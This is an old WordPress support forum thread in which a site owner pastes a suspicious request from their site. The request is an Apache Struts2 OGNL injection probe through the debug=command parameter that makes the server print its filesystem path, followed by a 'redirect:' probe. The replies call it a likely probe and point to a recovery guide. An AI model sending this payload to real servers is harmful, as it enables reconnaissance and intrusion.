Site attacked | ww.wp.xz.cn

kwss
(@kwss)

10 years, 7 months ago

Hello today I logged in an found this on my site:

mysite.com/?debug=command&expression=%23res%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletResponse\'),%23res.setCharacterEncoding(%22UTF-8%22),%23req%3d%23context.get(\'com.opensymphony.xwork2.dispatcher.HttpServletRequest\'),%23res.getWriter().print(%22dir:%22),%23res.getWriter().println(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23res.getWriter().flush(),%23res.getWriter().close()

and after that another:
mysite.com/?redirect:

what i need to find or be afraid of?

Viewing 2 replies - 1 through 2 (of 2 total)

bemdesign
(@bemdesign)

10 years, 7 months ago

Remain calm and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

Moderator Jan Dembowski
(@jdembowski)

Forum Moderator and Brute Squad

10 years, 7 months ago

Well… you might be compromised. Or not, you will see a lot of attack probes on your log.

Look closely at your site. If it is compromised then yes, that’s a good article to start off with.

If your are not compromised then it’s just a probe.

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Site attacked’ is closed to new replies.

In: Fixing WordPress
2 replies
3 participants
Last reply from: Jan Dembowski
Last activity: 10 years, 7 months ago
Status: not resolved

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics